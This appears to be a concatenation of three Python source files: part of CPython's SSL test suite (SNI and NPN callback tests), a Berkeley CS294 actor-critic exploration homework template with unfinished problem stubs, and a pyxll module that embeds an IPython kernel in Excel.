server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, SVN_PYTHON_ORG_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
tests.append(NetworkedBIOTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
train_ac_exploration_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Soroush Nasiriany, Sid Reddy, and Greg Kahn
Adapted for CS294-112 Fall 2018 with <3 by Michael Chang, some experiments by Greg Kahn, beta-tested by Sid Reddy
"""
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
from exploration import ExemplarExploration, DiscreteExploration, RBFExploration
from density_model import Exemplar, Histogram, RBF
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the output layer
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
output_placeholder = input_placeholder
with tf.variable_scope(scope):
for _ in range(n_layers):
output_placeholder = tf.layers.dense(output_placeholder, size, activation=activation)
output_placeholder = tf.layers.dense(output_placeholder, output_size, activation=output_activation)
return output_placeholder
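# Illustrative usage sketch (not part of the assignment): building a small
# policy head with the helper above. The placeholder shape and layer sizes
# below are assumptions chosen only for demonstration.
#
#     obs_ph = tf.placeholder(tf.float32, shape=[None, 4], name="obs")
#     logits = build_mlp(obs_ph, output_size=2, scope="policy",
#                        n_layers=2, size=64)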
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_AC)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Actor Critic
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_advantage_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.num_target_updates = computation_graph_args['num_target_updates']
self.num_grad_steps_per_target_update = computation_graph_args['num_grad_steps_per_target_update']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_advantage_args['gamma']
self.normalize_advantages = estimate_advantage_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True # may need if using GPU
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
def define_placeholders(self):
"""
Placeholders for batch observations / actions / advantages in the actor critic
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
sy_logits_na = build_mlp(sy_ob_no, self.ac_dim, 'discrete_logits', n_layers=self.n_layers, size=self.size)
return sy_logits_na
else:
sy_mean = build_mlp(sy_ob_no, self.ac_dim, 'continuous_logits', n_layers=self.n_layers, size=self.size)
sy_logstd = tf.Variable(tf.zeros(self.ac_dim), name='sy_logstd')
return (sy_mean, sy_logstd)
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na, num_samples=1), axis=1)
else:
sy_mean, sy_logstd = policy_parameters
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean), 0, 1)
return sy_sampled_ac
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
sy_logprob_n = tf.distributions.Categorical(logits=sy_logits_na).log_prob(sy_ac_na)
else:
sy_mean, sy_logstd = policy_parameters
sy_logprob_n = tfp.distributions.MultivariateNormalDiag(
loc=sy_mean, scale_diag=tf.exp(sy_logstd)).log_prob(sy_ac_na)
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch size /n/, observation dim)
_na - this tensor should have shape (batch size /n/, action dim)
_n - this tensor should have shape (batch size /n/)
Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
actor_loss = tf.reduce_sum(-self.sy_logprob_n * self.sy_adv_n)
self.actor_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(actor_loss)
# define the critic
self.critic_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_critic",
n_layers=self.n_layers,
size=self.size))
self.sy_target_n = tf.placeholder(shape=[None], name="critic_target", dtype=tf.float32)
self.critic_loss = tf.losses.mean_squared_error(self.sy_target_n, self.critic_prediction)
self.critic_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.critic_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards, next_obs, terminals = [], [], [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no : ob[None]})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
next_obs.append(ob)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
terminals.append(1)
break
else:
terminals.append(0)
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32),
"next_observation": np.array(next_obs, dtype=np.float32),
"terminal": np.array(terminals, dtype=np.float32)}
return path
def estimate_advantage(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Estimates the advantage function value for each timestep.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep or 0 if the episode did not end
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
next_values_n = self.sess.run(self.critic_prediction, feed_dict={self.sy_ob_no: next_ob_no})
q_n = re_n + self.gamma * next_values_n * (1-terminal_n)
curr_values_n = self.sess.run(self.critic_prediction, feed_dict={self.sy_ob_no: ob_no})
adv_n = q_n - curr_values_n
if self.normalize_advantages:
adv_n = (adv_n - np.mean(adv_n)) / (np.std(adv_n) + 1e-8)
return adv_n
def update_critic(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Update the parameters of the critic.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep or 0 if the episode did not end
returns:
nothing
"""
for i in range(self.num_grad_steps_per_target_update * self.num_target_updates):
if i % self.num_grad_steps_per_target_update == 0:
next_values_n = self.sess.run(self.critic_prediction, feed_dict={self.sy_ob_no: next_ob_no})
target_n = re_n + self.gamma * next_values_n * (1 - terminal_n)
_, loss = self.sess.run([self.critic_update_op, self.critic_loss],
feed_dict={self.sy_ob_no: ob_no, self.sy_target_n: target_n})
def update_actor(self, ob_no, ac_na, adv_n):
"""
Update the parameters of the policy.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
self.sess.run(self.actor_update_op,
feed_dict={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na, self.sy_adv_n: adv_n})
def train_AC(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
num_target_updates,
num_grad_steps_per_target_update,
animate,
logdir,
normalize_advantages,
seed,
n_layers,
size,
########################################################################
# Exploration args
bonus_coeff,
kl_weight,
density_lr,
density_train_iters,
density_batch_size,
density_hiddim,
dm,
replay_size,
sigma,
########################################################################
):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
########################################################################
# Exploration
if env_name == 'PointMass-v0':
from pointmass import PointMass
env = PointMass()
else:
env = gym.make(env_name)
dirname = logz.G.output_dir
########################################################################
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
'num_target_updates': num_target_updates,
'num_grad_steps_per_target_update': num_grad_steps_per_target_update,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_advantage_args = {
'gamma': gamma,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_advantage_args) #estimate_return_args
# build computation graph
agent.build_computation_graph()
########################################################################
# Initialize exploration density model
if dm != 'none':
if env_name == 'PointMass-v0' and dm == 'hist':
density_model = Histogram(
nbins=env.grid_size,
preprocessor=env.preprocess)
exploration = DiscreteExploration(
density_model=density_model,
bonus_coeff=bonus_coeff)
elif dm == 'rbf':
density_model = RBF(sigma=sigma)
exploration = RBFExploration(
density_model=density_model,
bonus_coeff=bonus_coeff,
replay_size=int(replay_size))
elif dm == 'ex2':
density_model = Exemplar(
ob_dim=ob_dim,
hid_dim=density_hiddim,
learning_rate=density_lr,
kl_weight=kl_weight)
exploration = ExemplarExploration(
density_model=density_model,
bonus_coeff=bonus_coeff,
train_iters=density_train_iters,
bsize=density_batch_size,
replay_size=int(replay_size))
exploration.density_model.build_computation_graph()
else:
raise NotImplementedError
########################################################################
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
########################################################################
if dm != 'none':
exploration.receive_tf_sess(agent.sess)
########################################################################
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = np.concatenate([path["reward"] for path in paths])
next_ob_no = np.concatenate([path["next_observation"] for path in paths])
terminal_n = np.concatenate([path["terminal"] for path in paths])
########################################################################
# Modify the reward to include exploration bonus
"""
1. Fit density model
if dm == 'ex2':
the call to exploration.fit_density_model should return ll, kl, elbo
else:
the call to exploration.fit_density_model should return nothing
2. Modify the re_n with the reward bonus by calling exploration.modify_reward
"""
old_re_n = re_n
if dm == 'none':
pass
else:
# 1. Fit density model
if dm == 'ex2':
### PROBLEM 3
### YOUR CODE HERE
raise NotImplementedError
elif dm == 'hist' or dm == 'rbf':
### PROBLEM 1
### YOUR CODE HERE
raise NotImplementedError
else:
assert False
# 2. Modify the reward
### PROBLEM 1
### YOUR CODE HERE
raise NotImplementedError
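# A hedged sketch of what the two steps above might look like (this is NOT the
# official solution; whether to fit on ob_no or next_ob_no, and the exact
# signatures of fit_density_model/modify_reward, are assumptions based only on
# the docstring above):
#
#     if dm == 'ex2':
#         ll, kl, elbo = exploration.fit_density_model(next_ob_no)
#     elif dm in ('hist', 'rbf'):
#         exploration.fit_density_model(next_ob_no)
#     re_n = exploration.modify_reward(re_n, next_ob_no)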
print('average state', np.mean(ob_no, axis=0))
print('average action', np.mean(ac_na, axis=0))
# Logging stuff.
# Only works for point mass.
if env_name == 'PointMass-v0':
np.save(os.path.join(dirname, '{}'.format(itr)), ob_no)
########################################################################
agent.update_critic(ob_no, next_ob_no, re_n, terminal_n)
adv_n = agent.estimate_advantage(ob_no, next_ob_no, re_n, terminal_n)
agent.update_actor(ob_no, ac_na, adv_n)
if n_iter - itr < 10:
max_reward_path_idx = np.argmax(np.array([path["reward"].sum() for path in paths]))
print(paths[max_reward_path_idx]['reward'])
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
########################################################################
logz.log_tabular("Unmodified Rewards Mean", np.mean(old_re_n))
logz.log_tabular("Unmodified Rewards Std", np.mean(old_re_n))
logz.log_tabular("Modified Rewards Mean", np.mean(re_n))
logz.log_tabular("Modified Rewards Std", np.mean(re_n))
if dm == 'ex2':
logz.log_tabular("Log Likelihood Mean", np.mean(ll))
logz.log_tabular("Log Likelihood Std", np.std(ll))
logz.log_tabular("KL Divergence Mean", np.mean(kl))
logz.log_tabular("KL Divergence Std", np.std(kl))
logz.log_tabular("Negative ELBo", -elbo)
########################################################################
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vac')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--num_target_updates', '-ntu', type=int, default=10)
parser.add_argument('--num_grad_steps_per_target_update', '-ngsptu', type=int, default=10)
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=32)
########################################################################
parser.add_argument('--bonus_coeff', '-bc', type=float, default=1e-3)
parser.add_argument('--density_model', type=str, default='hist | rbf | ex2 | none')
parser.add_argument('--kl_weight', '-kl', type=float, default=1e-2)
parser.add_argument('--density_lr', '-dlr', type=float, default=5e-3)
parser.add_argument('--density_train_iters', '-dti', type=int, default=1000)
parser.add_argument('--density_batch_size', '-db', type=int, default=64)
parser.add_argument('--density_hiddim', '-dh', type=int, default=32)
parser.add_argument('--replay_size', '-rs', type=int, default=int(1e6))
parser.add_argument('--sigma', '-sig', type=float, default=0.2)
########################################################################
args = parser.parse_args()
data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')
if not (os.path.exists(data_path)):
os.makedirs(data_path)
logdir = 'ac_' + args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join(data_path, logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_AC(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
num_target_updates=args.num_target_updates,
num_grad_steps_per_target_update=args.num_grad_steps_per_target_update,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
seed=seed,
n_layers=args.n_layers,
size=args.size,
########################################################################
bonus_coeff=args.bonus_coeff,
kl_weight=args.kl_weight,
density_lr=args.density_lr,
density_train_iters=args.density_train_iters,
density_batch_size=args.density_batch_size,
density_hiddim=args.density_hiddim,
dm=args.density_model,
replay_size=args.replay_size,
sigma=args.sigma
########################################################################
)
# Awkward hacky process runs, because Tensorflow does not like
# repeatedly calling train_AC in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
kernel.py
|
"""
Start an IPython Qt console or notebook connected to the python session
running in Excel.
This requires sys.executable to be set, and so it's recommended
that the following is added to the pyxll.cfg file:
[PYTHON]
executable = <path to your python installation>/pythonw.exe
"""
from .magic import ExcelMagics
from ipykernel.kernelapp import IPKernelApp
from ipykernel.embed import embed_kernel
from zmq.eventloop import ioloop
from pyxll import schedule_call
import subprocess
import logging
import threading
import queue
import atexit
import sys
import os
import re
_log = logging.getLogger(__name__)
_all_jupyter_processes = []
try:
import win32api
except ImportError:
win32api = None
if getattr(sys, "_ipython_kernel_running", None) is None:
sys._ipython_kernel_running = False
if getattr(sys, "_ipython_app", None) is None:
sys._ipython_app = False
def _which(program):
"""find an exe's full path by looking at the PATH environment variable"""
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
class PushStdout:
"""Context manage to temporarily replace stdout/stderr."""
def __init__(self, stdout, stderr):
self.__stdout = stdout
self.__stderr = stderr
def __enter__(self):
self.__orig_stdout = sys.stdout
self.__orig_stderr = sys.stderr
sys.stdout = self.__stdout
sys.stderr = self.__stderr
def __exit__(self, exc_type, exc_val, exc_tb):
sys.stdout = self.__orig_stdout
sys.stderr = self.__orig_stderr
def start_kernel():
"""starts the ipython kernel and returns the ipython app"""
if sys._ipython_app and sys._ipython_kernel_running:
return sys._ipython_app
# The stdout/stderrs used by IPython. These get set after the kernel has started.
ipy_stdout = sys.stdout
ipy_stderr = sys.stderr
# patch IPKernelApp.start so that it doesn't block
def _IPKernelApp_start(self):
nonlocal ipy_stdout, ipy_stderr
if self.poller is not None:
self.poller.start()
self.kernel.start()
# set up a timer to periodically poll the zmq ioloop
self.loop = ioloop.IOLoop.current()
def poll_ioloop():
try:
# Use the IPython stdout/stderr while running the kernel
with PushStdout(ipy_stdout, ipy_stderr):
# If the kernel has been closed then run the event loop until it gets to the
# stop event added by IPKernelApp.shutdown_request
if self.kernel.shell.exit_now:
_log.debug("IPython kernel stopping (%s)" % self.connection_file)
self.loop.start()
sys._ipython_kernel_running = False
return
# otherwise call the event loop but stop immediately if there are no pending events
self.loop.add_timeout(0, lambda: self.loop.add_callback(self.loop.stop))
self.loop.start()
except:
_log.error("Error polling Jupyter loop", exc_info=True)
schedule_call(poll_ioloop, delay=0.1)
sys._ipython_kernel_running = True
schedule_call(poll_ioloop, delay=0.1)
IPKernelApp.start = _IPKernelApp_start
# IPython expects sys.__stdout__ to be set; keep the original values so they
# can be restored after IPython has installed its own.
sys.__stdout__ = sys_stdout = sys.stdout
sys.__stderr__ = sys_stderr = sys.stderr
# call the API embed function, which will use the monkey-patched method above
embed_kernel(local_ns={})
ipy = IPKernelApp.instance()
# register the magic functions
ipy.shell.register_magics(ExcelMagics)
# Keep a reference to the kernel even if this module is reloaded
sys._ipython_app = ipy
# Restore sys stdout/stderr and keep track of the IPython versions
ipy_stdout = sys.stdout
ipy_stderr = sys.stderr
sys.stdout = sys_stdout
sys.stderr = sys_stderr
